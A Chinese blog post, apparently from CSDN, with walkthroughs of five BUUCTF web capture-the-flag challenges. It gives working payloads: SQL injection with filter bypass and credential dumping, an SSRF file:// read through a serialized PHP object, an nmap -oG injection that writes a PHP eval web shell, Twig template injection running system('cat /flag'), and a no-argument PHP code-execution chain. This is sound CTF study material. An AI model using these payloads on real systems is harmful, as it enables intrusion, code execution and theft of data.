BUUCTF 个人做题记录【6-7】

最新推荐文章于 2023-04-01 11:18:27 发布
最新推荐文章于 2023-04-01 11:18:27 发布
阅读量433 收藏
点赞数
分类专栏: DASCTF CTF buuctf 文章标签: sql 数据库 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61620566/article/details/125171007
版权
CTF 同时被 3 个专栏收录
12 篇文章 0 订阅
订阅专栏
buuctf
8 篇文章 0 订阅
订阅专栏
DASCTF
6 篇文章 0 订阅
订阅专栏

目录

1.[网鼎杯 2018]Fakebook 1

2.[RoarCTF 2019]Easy Java 1

3.[BUUCTF 2018]Online Tool 1

4.[BJDCTF2020]The mystery of ip 1

5.[GXYCTF2019]禁止套娃 1

1.[网鼎杯 2018]Fakebook 1

考点:

SSRF,也就是Server Side RequestForgery—服务器端请求伪造。从字面上来看,与CSRF不同的是,它是服务器端发出的请求伪造而非从用户一端提交。别误会,作为受信任用户,服务器当然不可能做出损害用户信息的事。它是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞。因为它是由服务端发起的,所以它能够请求到与它相连但与外网隔离的内部系统。
原文链接:https://blog.csdn.net/qq_44657899/article/details/104884553

先创建一个自己的页面,点进去

在源码找不到有帮助的信息

但在网址上发现sql注入点

我们查看查看一下列数

4列回显正常,5列回显错误

 试着联合查询,发现我union select被过滤

 

 我们用union/**/select绕过,

 回显点在2,发现数据库fakebook 

 查表:

?no=1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'

发现user表,查字段

?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'

?no=-1 union/**/select 1,group_concat(no,uersname,passwd,data),3,4 from users

 

提示序列化,但不知道序列化什么内容,这时候我们扫一下网站目录看看有没有隐藏文件,扫到robots.txt,访问一下

 

确实有隐藏文件,下载下就是源码

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

漏洞点

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

这个地方是直接吧blog当作参数传给get()函数,url没有经过任何限制,是存在ssrf的。这个地方可以使用file:///var/www/html/flag.php读取flag.php,构造payload

我们序列化内容

 

 

 列数为四,我们在第四列,blog栏传参

?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:11;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#

flag在源码里,base64解密即可

 

 

 

2.[RoarCTF 2019]Easy Java 1

看看help页面有什么,发现一个文件,但GEt方式无法下载,用POST

 

下载后就是

 

 下面是大佬总结的考点:原文链接:https://blog.csdn.net/weixin_44522540/article/details/115327172

敏感目录
(1) /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
(2) /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
(3) /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
(4) /WEB-INF/src/:源码目录,按照包名结构放置各个java文件。
(5)/WEB-INF/database.properties:数据库配置文件

WEB-INF/web.xml泄露
漏洞成因:通常一些web应用我们会使用多个web服务器搭配使用,解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用这种架构的时候,由于对静态资源的目录或文件的映射配置不当,可能会引发一些的安全问题,导致web.xml等文件能够被读取。
漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码。
我们POST访问/WEB-INF/web.xml

打开

 

 POST访问对应的.class文件

.class文件需要反编译才能看到源码,这里推荐GDA,比较方便

 解码即得flag

3.[BUUCTF 2018]Online Tool 1

题目打开先是一段代码审计

 

这里看到了两个很陌生的函数

    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);

PHP escapeshellarg()+escapeshellcmd() 之殇

先介绍一下函数(从别人那copy来的):

escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数

功能 :escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,
这样以确保能够直接将一个字符串传入 shell 函数,shell 函数包含 exec(), system() 执行运算符(反引号)
1
2
3
4
escapeshellcmd — shell 元字符转义

功能:escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 
此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。

反斜线(\)会在以下字符之前插入:
&#;`|\?~<>^()[]{}$*, \x0A 和 \xFF*。 *’ 和 “ 仅在不配对儿的时候被转义。 
在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替。
1
2
3
4
5
6
7
8
用那篇文章的例子解释一下:

传入参数是:172.17.0.2' -v -d a=1
首先经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1',
即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
再经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\',
这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义
最后执行的命令是curl '172.17.0.2'\\'' -v -da=1\',
由于中间的\\被解释为\而不再是转义字符,所以后面的'没有被转义,与再后面的'配对儿成了一个空白连接符。
所以可以简化为curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\发起请求,POST 数据为a=1’。
原理懂了,怎么用呢,我不知道,食我压·····,去瞄一眼别人的wp,看到了可以用nmap命令-oG将一个命令写入到自己指定的文件中,恍然大悟,payload:

?host=' <?php eval($_POST["v"]);?> -oG shell.php '
————————————————
版权声明:本文为CSDN博主「k0f1i」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:[BUUCTF 2018]Online Tool(超详细解析payload)_k0f1i的博客-CSDN博客_payload解析

对于payload的理解大佬已给出详细的解释,换句话说,我不懂

写入的文件目录

 红色标出的地方是写入文件的目录,我们访问shell.php一定要在shell.php前面加上对应的目录,否则访问失败

菜刀连接,flag在根目录下

 

 

4.[BJDCTF2020]The mystery of ip 1

考点:

  1. X-Forwarded-For注入
  2. PHP可能存在Twig模版注入漏洞

 

 在flag.php和hinit.php下什么也没发现,抓包看看

 

 请求包中添加:X-Forwarded-For:1,看看回显

被成功执行,说明XFF可控,测试了半天,因为是php页面,所以没想到模版注入,通过查阅资料
Flask可能存在Jinjia2模版注入漏洞
PHP可能存在Twig模版注入漏洞

添加模版算式,检测其是否可被执行:

X-Forwarded-For:{{7*7}}

命令成功执行,下面看看根目录下的文件

 X-Forwarded-For:{{system('ls /')}}

查看flag:

  X-Forwarded-For:{{system('cat /flag')}}

5.[GXYCTF2019]禁止套娃 1

 看到这,首先想到GIT源码泄露

kali下用Githack 看看

 发现index.php


<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

 大佬的博客:(85条消息) [GXYCTF2019]禁止套娃1(两种方法)_hcjtn的博客-CSDN博客_无参数rce

好了,现在就是代码审计了
最吸引眼球的就是 eval的一句话木马,题目又加了好多过滤限制了REC
首先是 php伪协议 data协议 filter协议 都不能使用了
然后该网站使用了正则匹配 其实这就是无参数的rce

如果如果’;'===preg_replace(…),那么就执行exp传递的命令
(?R)? : (?R)代表当前表达式,就是这个(/[a-z,_]+((?R)?)/),所以会一直递归,?表示递归当前表达式0次或1次(若是(?R)*则表示递归当前表达式0次或多次,例如它可以匹配a(b(c()d())))
无参数REC 一般有三种绕过姿势:

gettallheaders()
get_defined_vars()
session_id()
具体可以参考博客
紧接着 又是一次黑名单过滤,很多的关键字都被黑掉了(带有get 函数的,肯定是不能用了)
但还有一个函数 scandir 以扫描当前目录下的文件

这里,我就直接构造payload:

exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
1
highlight_file() 函数对文件进行语法高亮显示,本函数是show_source() 的别名
next() 输出数组中的当前元素和下一个元素的值。
array_reverse() 函数以相反的元素顺序返回数组。(主要是能返回值)
scandir() 函数返回指定目录中的文件和目录的数组。
pos() 输出数组中的当前元素的值。
localeconv() 函数返回一个包含本地数字及货币格式信息的数组,该数组的第一个元素就是"."。
原理:
loacleconv 函数会固定返回一个 . 然后pos将我们获得的 .返回到我们构造的 payload 使得 scandir能够返回当前目录下的数组(换句话说,就是读出当前目录下的文件) rray_reverse()以相反的顺序输出(目的是以正序输出查询出来的内容)然后 next 提取第二个元素(将.过滤出去),最后用highlight_file()给显示出来。

 

 

 

 

 

不用再等
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf 监听端口_SSRF 漏洞分析与利用(含 CTF 例题)
weixin_33404919的博客
01-13 1598
原标题:SSRF 漏洞分析与利用(含 CTF 例题)16004488 总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的。 一、漏洞产生以curl为例,漏洞代码为ssrf.php$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);#curl_setopt($ch, CURLOPT_FOLLOWLOC...
[BUUCTF 2018]Online Tool(超详细解析payload)
xlcvv的博客
04-15 3874
先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET[...
buuctf(探险2)
qq_62046696的博客
08-08 901
先上传一个一句话木马.,过滤了然后用可以通过,大概还是过滤了
BUUCTF-菜刀666
最新发布
m0_63563528的博客
04-01 2788
BUUCTF-菜刀666,使用工具:wireshark,010editor
CTF题记——详谈两道Web
m0re's blog
11-02 1161
前言 最近学校也在招新,基本没什么时间做题,最近也很少发博客。就写几道题来充充数吧。 正文 fakebook 我的思路呢,只有一点沾边了,记一下现在的思考: 注册了一个username就找不到其他信息了,然后考虑了源码泄露。找了robots.txt,发现了一个user.php.bak,访问得到泄露的文件。是这样 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; p
buuctf】john-in-the-middle
qi_SJQ_的博客
12-19 613
wireshark流量分析题
BUUCTF misc------伟大的侦探
zhang26074的博客
10-17 760
下载附件,打开后为压缩文件 发现有密码 打开密码.txt 提示编码 用010editer打开密码.txt 将编码方式改为EBCDIC编码 则会显示出密码wllm_is_the_best_team! 解压此压缩包会看到18张图片 根据福尔摩斯探案集中跳舞的小人对照表 可以得到iloveholmesandwllm 所以 flag{iloveholmesandwllm} ...
BUUCTF------mrctf2020_easyoverflow
qq_33010875的博客
10-08 340
环境:WSL2,ubuntu16.04,python2 checksec文件: 拖入ida分析: main函数中就有system(‘bin/sh’),只要check函数的返回值为1即可执行 查看check函数: 只要a1和fake_flag相等,函数就能返回1 a1就是main函数里的v5,值为:ju3t_@_f@k3_f1@g fake_flag的值为:n0t_r3@11y_f1@g 只要将v5的值覆盖为n0t_r3@11y_f1@g即可 main函数中有get函数可用, v4: v4是var_
BuuCTF做题记录-[BJDCTF 2nd]假猪套天下第一
qq_46231152的博客
11-24 364
夹竹桃天下第一!!! 尝试输入admin登入,登陆失败 随便输入一个账号登录,登陆成功 重新返回登录界面提交表单,使用Burp抓包
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2048
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 4077
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
CTF SSRF redis写入shell、计划任务
03-07 1056
CTF SSRF redis写入shell、计划任务
web buuctf [BUUCTF 2018]Online Tool1
weixin_44214568的博客
03-24 2929
考点:escapeshellarg()和escapeshellcmd()漏洞; RCE漏洞 通过代码审计,传参是host,最后的输出对host利用namp扫描, 主要函数就是 $host = escapeshellarg($host); $host = escapeshellcmd($host); escapeshellarg(): escapeshellarg(string$arg):string 重点:escapeshellarg()将给字符串增加一个单引号并且能引用或...
[BUUCTF 2018]Online Tool
沐目的博客
10-31 6209
我到底到什么时候,才能学会,看知识点写题,而不是看题解写题。 原因: 基础太差,无法把漏洞知识与实际相结合。 “漏洞知道了,可这和这道题有什么关系?”就是我目前的状态。 如果我知道 namp -PS 127.0.0.1 namp -PS ‘’ 127.0.0.1 nmap -PS ’ " " ’ 127.0.0.1 " " 引号闭合后,加上这些,无影响 如果我知道 namp <?php...
[BUUCTF 2018]Online Tool 1
weixin_46196627的博客
06-15 2226
[BUUCTF 2018]Online Tool1查看代码,题目本意是用户输入ip地址,执行nmap扫描 $_SERVER 可以获取服务器和执行环境信息 HTTP_X_FORWARDED_FOR HTTP扩展头部,用来表示http请求端真实ip REMOTE_ADDR代表客户端的IP,但它的值不是由客户端提供的,而是服务端根据客户端的ip指定的,当你的浏览器访问某个网站时,假设中间没有任何代理,那么网站的web服务器(Nginx,Apache等)就会把remote_addr设为你的机器IP,如果你用了某个代
CTF笔记 攻防世界 fakebook
qq_51248658的博客
10-10 1353
第一次做,拿到题目一开始就被注册难住了,blog该填啥???于是忍不住直接就去看wp了。。。。。。后面过了一段时间再去做发现,除了注册,后面还是没有思路,只是隐约记得有个反序列化。。。。这里就记一下,加深以下印像。第一次认真跟着大佬的wp一步步做下来,学到了很多,sql注入那里还是有些薄弱,判断闭合的时候总想不到直接空格,多积累吧。。。。
ctf刷题记录
enhengzZ的博客
04-23 1409
基础认证题 页面中依据提示 可猜测用户为admin 可弱口令尝试(admin)------失败 暴脾气,,,词典爆破! 下载其页面提供的词典 抓包处对上图circle处进行解密 在burp的decode模板中进行查询可知其加密方式为base64 载入词典 此处开始走弯路:1.词典所加载的均为密码,缺少用户名(发现问题后,度娘学习正则表达式,很好,又学了个奇奇怪怪的姿势)2.词典爆破后一直都是401返回,长度均为404,没有出现200返回(原因未明) ----------------------------
php curl的几个例子
mouyu1的专栏
09-12 648
使用PHP的cURL库可以简单和有效地去抓网页。你只需要运行一个脚本,然后分析一下你所抓取的网页,然后就可以以程序的方式得到你想要的数据了。无论是你想从从一个链接上取部分数据,或是取一个XML文件并把其导入数据库,那怕就是简单的获取网页内容,cURL 是一个功能强大的PHP库。PHP中的CURL函数库(Client URL Library Function)curl_close — 关
一道CTF题学习php的curl扩展模块
bj5716的博客
05-30 4231
前言作为一个web安全学的很痛苦,还始终学不会的人,决定要好好学web安全了。这次见识了一下DDCTF的题目,难度对于我来说非常高,所以决定写一些学习总结,也不算wp,就是笔记这种吧,这篇文章以学习PHP的CURL模块为主,用这道很基础的SQL注入题来引一下子。题目描述一出来什么都没有,只有一个这个提示。所以说,这个就下意识改一下头吧,添加一个X-Forwarded-For项就可以了对吧。而且这个...
buuctf [weblogic]cve-2017-10271
03-10
我可以回答这个问题。buuctf [weblogic]cve-2017-10271 是一个漏洞,影响 Oracle WebLogic Server,可以允许攻击者远程执行代码。建议用户及时更新补丁以保护系统安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值